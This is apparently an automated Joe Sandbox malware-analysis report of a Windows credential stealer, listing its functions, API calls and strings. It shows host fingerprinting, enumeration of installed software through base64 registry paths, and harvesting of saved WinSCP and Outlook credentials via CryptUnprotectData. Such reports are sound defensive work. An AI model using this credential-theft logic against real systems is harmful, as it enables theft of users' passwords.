Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

[Soft], xrefs: 004174D4
LocalTime: , xrefs: 0041743F
Computer(Username) : , xrefs: 00417364
MachineID : , xrefs: 004172B0
EXE_PATH : , xrefs: 004172D3
Zone: , xrefs: 00417462
, xrefs: 004172E5, 00417472, 00417490
Windows : , xrefs: 004172F8
Screen: , xrefs: 004173BD
Layouts: , xrefs: 0041741C

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumInfoMetricsOpen$CreateFirstFreeInformationLocaleProcess32SnapshotStringTimeToolhelp32Zone
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 441461025-943277980
Opcode ID: a22df512de9960ae85694d245b4f4119eedafc5602223ade3eea4ad26099b946
Instruction ID: faa4580c3751e67dc94fa71ed2fe839e62200f283c7ef28ebc39c5cb7ba49714
Opcode Fuzzy Hash: a22df512de9960ae85694d245b4f4119eedafc5602223ade3eea4ad26099b946
Instruction Fuzzy Hash: 94814F70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A568B19

Function 0041727C Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 211
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32(00000000), ref: 004173D7
GetSystemMetrics.USER32(00000001), ref: 004173EE

Part of subcall function 00416FB8: GetLocaleInfoA.KERNEL32(?,00000059,?,00000100,?,-00000001,0041B0FC,?,?,00417429,Layouts: ,?,00417604,?,00000001,00417654), ref: 00417015

Part of subcall function 00417098: GetTimeZoneInformation.KERNEL32(?,00000000,00417170,?,-00000001,0041B0FC,?,?,0041746F,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8), ref: 004170D6

Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3

Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
Part of subcall function 00416B94: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC), ref: 00416C90
Part of subcall function 00416B94: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00416CAF

Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC

Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

[Soft], xrefs: 004174D4
LocalTime: , xrefs: 0041743F
Computer(Username) : , xrefs: 00417364
MachineID : , xrefs: 004172B0
EXE_PATH : , xrefs: 004172D3
Zone: , xrefs: 00417462
, xrefs: 004172E5, 00417472, 00417490
Windows : , xrefs: 004172F8
Screen: , xrefs: 004173BD
Layouts: , xrefs: 0041741C

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumInfoMetricsOpen$CreateFirstFreeInformationLocaleProcess32SnapshotStringTimeToolhelp32Zone
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 441461025-943277980
Opcode ID: 98dee303eb0a02b075d06b4305ddd7e6e2251ef1b4c9c9bc19e8ba4959754855
Instruction ID: 915cc31ebaf767ee9912e0c916b5d60c1651ad94c460c6a34579714c0f7d2b16
Opcode Fuzzy Hash: 98dee303eb0a02b075d06b4305ddd7e6e2251ef1b4c9c9bc19e8ba4959754855
Instruction Fuzzy Hash: 9A814E70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A468B19

Function 00417290 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 201
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32(00000000), ref: 004173D7
GetSystemMetrics.USER32(00000001), ref: 004173EE

Part of subcall function 00416FB8: GetLocaleInfoA.KERNEL32(?,00000059,?,00000100,?,-00000001,0041B0FC,?,?,00417429,Layouts: ,?,00417604,?,00000001,00417654), ref: 00417015

Part of subcall function 00417098: GetTimeZoneInformation.KERNEL32(?,00000000,00417170,?,-00000001,0041B0FC,?,?,0041746F,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8), ref: 004170D6

Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3

Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
Part of subcall function 00416B94: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC), ref: 00416C90
Part of subcall function 00416B94: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00416CAF

Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC

Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

[Soft], xrefs: 004174D4
LocalTime: , xrefs: 0041743F
Computer(Username) : , xrefs: 00417364
MachineID : , xrefs: 004172B0
EXE_PATH : , xrefs: 004172D3
Zone: , xrefs: 00417462
, xrefs: 004172E5, 00417472, 00417490
Windows : , xrefs: 004172F8
Screen: , xrefs: 004173BD
Layouts: , xrefs: 0041741C

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProcSleepSystem$EnumInfoMetricsOpen$CreateFirstFreeInformationLocaleProcess32SnapshotStringTimeToolhelp32Zone
String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
API String ID: 441461025-943277980
Opcode ID: c695cf2f64643f6a8b9bdd899a899abbc7edb470dd547c53306ff2a9d56b2676
Instruction ID: 9ad36b54795493928cf4d7680a901020c7452f2e53798e9be21810986d7bb062
Opcode Fuzzy Hash: c695cf2f64643f6a8b9bdd899a899abbc7edb470dd547c53306ff2a9d56b2676
Instruction Fuzzy Hash: A2714E30A44109ABCF01FFD1CC42FCDBBBAAF48309F60407BB104B65D6D67DAA468A19

Function 00415F30 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 305
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8

Part of subcall function 00407500: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9

Part of subcall function 00407500: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

(), xrefs: 00416304
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs, xrefs: 00415F72, 00416135
RGlzcGxheVZlcnNpb24=, xrefs: 0041605A, 0041621D
), xrefs: 004160E7, 004162AA
RGlzcGxheU5hbWU=, xrefs: 00415FB9, 0041617C
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==, xrefs: 00415FE8, 00416089, 004161AB, 0041624C
, xrefs: 0041633A

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: Open$EnumFreeString$QueryValue
String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
API String ID: 811798878-3013244427
Opcode ID: 0a802d6b2b28f8a3cec4c5b369de7d2647960f4ce8c56f56f322f6ceca72c3d5
Instruction ID: 33798bc805095534a257e2f05040e6cfe59ff7211d39a9aa4329e2c1f04a858c
Opcode Fuzzy Hash: 0a802d6b2b28f8a3cec4c5b369de7d2647960f4ce8c56f56f322f6ceca72c3d5
Instruction Fuzzy Hash: 34C124B1A001189BD710EB55CC81BCEB7BDAF44309F5145FBA608B7286DA38AF858F5D

Function 0040C61C Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 189registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(80000001,00000000,?,00000000,0040C917,?,0041B0FC,00000000,0000010A,00000000,00000000,?,0040D838,00000000,0040D863), ref: 0040C662

Part of subcall function 00407500: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9

Part of subcall function 00407500: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582

Strings

WinSCP, xrefs: 0040C886
UserName, xrefs: 0040C741
word, xrefs: 0040C760
HostName, xrefs: 0040C6AA
Software\Martin Prikryl\WinSCP 2\Sessions\, xrefs: 0040C63F
Pass, xrefs: 0040C753
PortNumber, xrefs: 0040C6FA

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: Open$QueryValue
String ID: HostName$Pass$PortNumber$Software\Martin Prikryl\WinSCP 2\Sessions\$UserName$WinSCP$word
API String ID: 2123561561-2322492109
Opcode ID: 2549a3845886fb1d73b90281738a441e75dfd7ec2147bef4fc19a8b7e40004cd
Instruction ID: 5d9faefb47a508b6b932707abb8d3e63a2159bc82d2b43fde2965f92b9b3847f
Opcode Fuzzy Hash: 2549a3845886fb1d73b90281738a441e75dfd7ec2147bef4fc19a8b7e40004cd
Instruction Fuzzy Hash: 5781DA74A0011D9BDB10EB55C881BDEB3FDFF48309F1081BAA548B7295DA34AF458F99

Function 00416740 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 116COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 0041678C
CPU Count: , xrefs: 004167EF
GetRAM: , xrefs: 00416833
CPU Model: , xrefs: 0041677E
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 004167A8
Video Info, xrefs: 00416856

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: 5132eeb7f806ffcce6600860813d658f9c141ea878eb7d5a298b8541f7ce37a4
Instruction ID: ec5783c0b7ca42e81122729fbed3a1ddf4b85dfc6774dd9c704540b43fb157b1
Opcode Fuzzy Hash: 5132eeb7f806ffcce6600860813d658f9c141ea878eb7d5a298b8541f7ce37a4
Instruction Fuzzy Hash: 64411270A1010D9BDB01FFD1D882ADDBBB9EF48309F51403BF504B7296D639EA458B59

Function 00416744 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 0041678C
CPU Count: , xrefs: 004167EF
GetRAM: , xrefs: 00416833
CPU Model: , xrefs: 0041677E
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 004167A8
Video Info, xrefs: 00416856

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: 4c721573790b637321503a34bf9f9130f875e835aa05bc4e5c44d90894d68e0a
Instruction ID: 93658ecaa3e0ddcdd5b33a88495a7f5ee5c1cb8a97fdfd99440d65a07410f67b
Opcode Fuzzy Hash: 4c721573790b637321503a34bf9f9130f875e835aa05bc4e5c44d90894d68e0a
Instruction Fuzzy Hash: DF411F70A1010DABDB01FFD1D882ACDBBB9EF48309F61403BF504B7296D639EA458A58

Function 00407168 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

GetFileAttributesW.KERNEL32(00000000,00000000,00000000,00407293,?,?), ref: 004071B4
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,?,?), ref: 004071CA
GetFileAttributesW.KERNEL32(00000000,00000000,?,?), ref: 004071DF
CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,?,?), ref: 004071F5
ReadFile.KERNEL32(000000FF,004147A5,?,LLA,00000000,00000000,00407263,?,?,?), ref: 00407246
CloseHandle.KERNEL32(000000FF,0040726A), ref: 00407260

Strings

LLA, xrefs: 0040722F, 00407232

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$AllocCloseHandleReadString
String ID: LLA
API String ID: 2383866247-3688291513
Opcode ID: 75eb9d9cc74f66bbc11c0e4bff8767fcc953f0eb9a1eeebabd35c08362e6773b
Instruction ID: 15f3138c5d2d0105ebd27124ca223b3e8d37c88ea2c7106052068400f28ec596
Opcode Fuzzy Hash: 75eb9d9cc74f66bbc11c0e4bff8767fcc953f0eb9a1eeebabd35c08362e6773b
Instruction Fuzzy Hash: 5F31D970A04208AFD711DFA9DC92FAEB7F8EB49710F504076F514F72A0D734AE048A59

Function 00416584 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,0041660E,?,0041B0FC,?), ref: 004165AB
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004165B1
GlobalMemoryStatusEx.KERNEL32(00000040,00000000,kernel32.dll,GlobalMemoryStatusEx,00000000,0041660E,?,0041B0FC,?), ref: 004165D2

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Strings

kernel32.dll, xrefs: 004165A6
GlobalMemoryStatusEx, xrefs: 004165A1
@, xrefs: 004165C7

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressFreeGlobalLibraryLoadMemoryProcStatusString
String ID: @$GlobalMemoryStatusEx$kernel32.dll
API String ID: 420089832-3878206809
Opcode ID: 8e854a2ba74b1c5241b7f672217e8f5dde30ec227ceeb4d776eac7be45f0136a
Instruction ID: ae4c68d41a3a4174a937c26ab83d8f0c6d254553f6270358502c1b43c0ddce29
Opcode Fuzzy Hash: 8e854a2ba74b1c5241b7f672217e8f5dde30ec227ceeb4d776eac7be45f0136a
Instruction Fuzzy Hash: A3018871A002086BD711EBA5DC42E8EB7BDEB88744F61413AF504B32D1E77CAD01855C

Function 0040B4F0 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 474registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32(80000001,00000000,?,00000000,0040BC91,?,00000000,0041B0FC,00000000,00000000,00000000,?,0040BDCD,00000000,0040BE3B), ref: 0040B5CE

Part of subcall function 00407500: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9

Part of subcall function 00407500: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582

Strings

Outlook, xrefs: 0040BB86
Email, xrefs: 0040B74F, 0040B88A
://, xrefs: 0040BB3E

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: Open$QueryValue
String ID: ://$Email$Outlook
API String ID: 2123561561-3514658839
Opcode ID: 1b91c70bddef8855b1c57f48077b17458388f3819d2c8f6e2dca049ebc445301
Instruction ID: e1c3844307c2052eba75b247cc482dfae18de03193ffd78a417120a12b23954d
Opcode Fuzzy Hash: 1b91c70bddef8855b1c57f48077b17458388f3819d2c8f6e2dca049ebc445301
Instruction Fuzzy Hash: F4120E34A40159ABDB10EB55CC81FDEB7B9EF44304F1040BAB548B72D5DBB8AE858F98

Function 004095A4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00409890,?,.tmp,?,?,?,00000000,00000000,00000000,?,?,00409A1F), ref: 00409676

Part of subcall function 004094C4: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004094E5
Part of subcall function 004094C4: LocalFree.KERNEL32(?), ref: 0040950A

DeleteFileW.KERNEL32(00000000), ref: 004097FB

Strings

%TEMP%, xrefs: 0040962E
.tmp, xrefs: 0040960E

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: File$CopyCryptDataDeleteFreeLocalUnprotect
String ID: %TEMP%$.tmp
API String ID: 691380987-3650661790
Opcode ID: aff096bd16069cd4b177f000ef9ea30393db51c7283037b831e6c9d6e30e9123
Instruction ID: 0066d1c1be5024352ad70b1cbef22ae6b56226110b13b2bd45aebffaaabcbc52
Opcode Fuzzy Hash: aff096bd16069cd4b177f000ef9ea30393db51c7283037b831e6c9d6e30e9123
Instruction Fuzzy Hash: 3981A471A10109AFDB00EB99D881E9EB7B9EF48304F108576F514F72A2DA39AE058B59

Function 0040DDB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C), ref: 0040DE38
DeleteFileW.KERNEL32(00000000,00000000,0040DEAF,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004148F8,00000001,00414C4C,00000001,?), ref: 0040DE7A

Strings

LLA, xrefs: 0040DE19, 0040DE26
%TEMP%\curbuf.dat, xrefs: 0040DE1C, 0040DE44, 0040DE67

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: File$AllocCopyDeleteString
String ID: %TEMP%\curbuf.dat$LLA
API String ID: 5292005-3909751444
Opcode ID: b798be6d7d0ebf9bf1a56ba25b348adeabac667b7a7b4344f003544cc533032e
Instruction ID: d3139e3bb668dcd489f787ebceafddff3eb8ed9e6fe86914fc70b8a9fa006da4
Opcode Fuzzy Hash: b798be6d7d0ebf9bf1a56ba25b348adeabac667b7a7b4344f003544cc533032e
Instruction Fuzzy Hash: 3E21FC74D10509ABDB00FBE5C88299EB7B9AF54305F50857BF400B72D2D738AE058A99

Function 0040955E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 00409573
GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 00409579

Strings

CryptUnprotectData, xrefs: 00409569
crypt32.dll, xrefs: 0040956E

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32.dll
API String ID: 2574300362-1827663648
Opcode ID: 75ffce093a627a703e76a5faf482da699b1f717085a244e79174a14ab70f32b7
Instruction ID: 1936ed15528034ef1a8706b88be01f12f22861c51f7a066308f0a1848fab801f
Opcode Fuzzy Hash: 75ffce093a627a703e76a5faf482da699b1f717085a244e79174a14ab70f32b7
Instruction Fuzzy Hash: 89C04CF368030376CF466B779D4A5462294B7C1B1D760493BF511B11D2D6BC8D404F5D

Function 00407C58 Relevance: 4.6, APIs: 3, Instructions: 80COMMON

Download Yara Rule

APIs

LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407D16), ref: 00407CD9
CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00407CEC
FreeSid.ADVAPI32(00000000,00407D1D), ref: 00407D10

Memory Dump Source

Source File: 00000007.00000002.1423208389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_jd4t3R7hOq.jbxd

Yara matches

Similarity

API ID: AccountCheckFreeLookupMembershipToken
String ID:
API String ID: 1602037265-0
Opcode ID: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
Instruction ID: 099d520652cb879bdf47a43f009fc20e3076d83f6f5b891ba4a5cda1263a2b72
Opcode Fuzzy Hash: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
Instruction Fuzzy Hash: 7821A475A04209AFDB41CFA8DC51FEEB7F8EB48700F104466EA14E7290E775AA01DBA5

Function 004072A0 Relevance: 4.6, APIs: 3, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000000,00000000,00000000,00407334,?,00000000), ref: 004072EA
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00407307
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00407314

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Memory Dump Source

